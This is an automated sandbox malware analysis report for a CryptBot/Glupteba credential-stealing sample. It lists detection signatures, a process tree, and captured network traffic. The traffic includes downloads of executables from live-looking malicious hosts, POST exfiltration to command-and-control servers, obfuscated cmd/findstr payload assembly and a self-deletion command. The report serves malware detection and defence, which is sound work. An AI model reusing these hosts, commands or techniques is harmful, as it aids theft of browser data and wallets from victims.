Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 7yyqdBJVGf.exe

Overview

General Information

Sample Name:7yyqdBJVGf.exe
Analysis ID:492301
MD5:267667a4bbfdfcf20c407c2b191fd0ed
SHA1:73870de4caa2eaaf162c81c34740527e12b8467c
SHA256:c3b9a8dde21bf3c1bb09426a261c77eb4b59cb2f36ac82e5b8f6b4a4d3565b5b
Tags:CryptBotexe
Infos:

Most interesting Screenshot:

Detection

Cryptbot Glupteba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Cryptbot
Detected unpacking (overwrites its own PE header)
Yara detected Glupteba
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Submitted sample is a known malware sample
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Machine Learning detection for sample
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: WScript or CScript Dropper
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Obfuscated command line found
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • 7yyqdBJVGf.exe (PID: 2916 cmdline: 'C:\Users\user\Desktop\7yyqdBJVGf.exe' MD5: 267667A4BBFDFCF20C407C2B191FD0ED)
    • File.exe (PID: 2116 cmdline: 'C:\Users\user~1\AppData\Local\Temp\File.exe' MD5: 303F5DE158A079AAE941319BE50D1F2D)
      • wheezy.exe (PID: 1708 cmdline: C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe MD5: 20B1305BCB80B32661D564CE22DF4C24)
        • dllhost.exe (PID: 4712 cmdline: dllhost.exe MD5: 70E2034A1C3D0ECCB73F57E33D4BFFA0)
        • cmd.exe (PID: 5112 cmdline: cmd /c cmd < Quegli.wav MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5456 cmdline: cmd MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • findstr.exe (PID: 5528 cmdline: findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav MD5: 8B534A7FC0630DE41BB1F98C882C19EC)
            • Bisogna.exe.com (PID: 5296 cmdline: Bisogna.exe.com l MD5: C56B5F0201A3B3DE53E561FE76912BFD)
              • Bisogna.exe.com (PID: 4884 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l MD5: C56B5F0201A3B3DE53E561FE76912BFD)
                • wscript.exe (PID: 6388 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
            • PING.EXE (PID: 2860 cmdline: ping 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
      • parted.exe (PID: 160 cmdline: C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe MD5: C92045F9553387FE8AB90B2B6A24E805)
        • IntelRapid.exe (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe MD5: C92045F9553387FE8AB90B2B6A24E805)
    • cmd.exe (PID: 5072 cmdline: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 3888 cmdline: timeout 4 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • IntelRapid.exe (PID: 6180 cmdline: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe MD5: C92045F9553387FE8AB90B2B6A24E805)
  • rundll32.exe (PID: 6264 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\' MD5: 73C519F050C20580F8A62C849D49215A)
  • IntelRapid.exe (PID: 6464 cmdline: 'C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe' MD5: C92045F9553387FE8AB90B2B6A24E805)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmpJoeSecurity_CryptbotYara detected CryptbotJoe Security
    00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmpJoeSecurity_CryptbotYara detected CryptbotJoe Security
      00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmpJoeSecurity_CryptbotYara detected CryptbotJoe Security
        Process Memory Space: 7yyqdBJVGf.exe PID: 2916JoeSecurity_Glupteba_1Yara detected GluptebaJoe Security
          Process Memory Space: 7yyqdBJVGf.exe PID: 2916JoeSecurity_CryptbotYara detected CryptbotJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            24.2.Bisogna.exe.com.39857c0.3.raw.unpackJoeSecurity_GenericDownloader_3Yara detected Generic DownloaderJoe Security
              24.2.Bisogna.exe.com.395ebb0.4.raw.unpackJoeSecurity_GenericDownloader_3Yara detected Generic DownloaderJoe Security
                24.2.Bisogna.exe.com.f90000.1.unpackJoeSecurity_GenericDownloader_3Yara detected Generic DownloaderJoe Security
                  0.2.7yyqdBJVGf.exe.3080e50.3.unpackJoeSecurity_CryptbotYara detected CryptbotJoe Security
                    0.3.7yyqdBJVGf.exe.30d0000.0.unpackJoeSecurity_CryptbotYara detected CryptbotJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Script Execution From Temp FolderShow sources
                      Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l, ParentImage: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com, ParentProcessId: 4884, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' , ProcessId: 6388
                      Sigma detected: WScript or CScript DropperShow sources
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l, ParentImage: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com, ParentProcessId: 4884, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' , ProcessId: 6388

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://zukelx03.top/downfiles/lv.exeAvira URL Cloud: Label: phishing
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 7yyqdBJVGf.exeVirustotal: Detection: 52%Perma Link
                      Source: 7yyqdBJVGf.exeReversingLabs: Detection: 48%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://zukelx03.top/downfiles/lv.exeVirustotal: Detection: 12%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exeReversingLabs: Detection: 33%
                      Source: C:\Users\user\AppData\Local\Temp\File.exeReversingLabs: Detection: 33%
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeReversingLabs: Detection: 35%
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeReversingLabs: Detection: 35%
                      Machine Learning detection for sampleShow sources
                      Source: 7yyqdBJVGf.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeJoe Sandbox ML: detected
                      Source: 13.0.wheezy.exe.4e0000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 13.2.wheezy.exe.4e0000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00401220 GetFileAttributesW,CreateFileW,GetFileSizeEx,CloseHandle,CreateFileMappingW,MapViewOfFile,CloseHandle,CloseHandle,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E662D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeUnpacked PE file: 0.2.7yyqdBJVGf.exe.400000.0.unpack
                      Source: 7yyqdBJVGf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.7:49849 version: TLS 1.2
                      Source: Binary string: wextract.pdb source: wheezy.exe, wheezy.exe.10.dr
                      Source: Binary string: wextract.pdb0lbp source: wheezy.exe, 0000000D.00000002.338763664.00000000004E1000.00000020.00020000.sdmp, wheezy.exe.10.dr
                      Source: Binary string: C:\sojeli.pdb source: 7yyqdBJVGf.exe
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: parted.exe, 0000000F.00000002.332649250.00007FF613923000.00000040.00020000.sdmp, IntelRapid.exe, 00000016.00000002.776682417.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001A.00000002.340848160.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001D.00000002.367061379.00007FF778293000.00000040.00020000.sdmp
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: IntelRapid.exe
                      Source: Binary string: acppage.pdb source: acppage.dll.10.dr
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Temp
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_004026C0 Sleep,FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0042B3BE FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_00406301 FindFirstFileW,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E23D4 FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: iplogger.org
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 88.99.66.31 187
                      May check the online IP address of the machineShow sources
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comDNS query: name: ip-api.com
                      Source: C:\Windows\SysWOW64\wscript.exeDNS query: name: iplogger.org
                      Uses ping.exe to check the status of other devices and networksShow sources
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                      Yara detected Generic DownloaderShow sources
                      Source: Yara matchFile source: 24.2.Bisogna.exe.com.39857c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Bisogna.exe.com.395ebb0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Bisogna.exe.com.f90000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Bisogna.exe.com.393bfa8.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Sep 2021 13:24:11 GMTServer: Apache/2.2.22 (@RELEASE@)Last-Modified: Tue, 28 Sep 2021 09:56:00 GMTETag: "380018-44fbf6-5cd0b38838d02"Accept-Ranges: bytesContent-Length: 4520950Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 17 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 18 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 18 ef 00 00 00 00 16 00 00 f0 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /1N5Jh7 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: iplogger.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: pacdpo22.topContent-Length: 73148Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: moreil02.topContent-Length: 73136Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: zukelx03.topConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: zukelx03.topConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ip-api.comConnection: Keep-Alive
                      Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmpString found in binary or memory: http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7string
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: wheezy.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: wheezy.exe.10.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/json
                      Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580849231.0000000000C93000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/jsonC:
                      Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/jsonH
                      Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/jsonQ
                      Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/jsoncountryCodeinvalid
                      Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/jsonq
                      Source: File.exe, 0000000A.00000002.321489177.0000000000409000.00000002.00020000.sdmp, File.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.296660042.0000000002E58000.00000004.00000001.sdmpString found in binary or memory: http://pacdpo22.top/index.php
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: 7yyqdBJVGf.exe, 00000000.00000002.316458179.0000000005220000.00000004.00000001.sdmpString found in binary or memory: http://zukelx03.top/downfiles/lv.exe
                      Source: 7yyqdBJVGf.exe, 7yyqdBJVGf.exe, 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://zukelx03.top/download.php?file=lv.exe
                      Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7s
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: https://evernote.com/
                      Source: Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp, Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, wscript.exe, 00000029.00000003.581967633.0000000005773000.00000004.00000040.sdmpString found in binary or memory: https://iplogger.org/1N5Jh7
                      Source: 7yyqdBJVGf.exe, 00000000.00000002.316164733.0000000002E60000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
                      Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.comXf;
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: pacdpo22.top
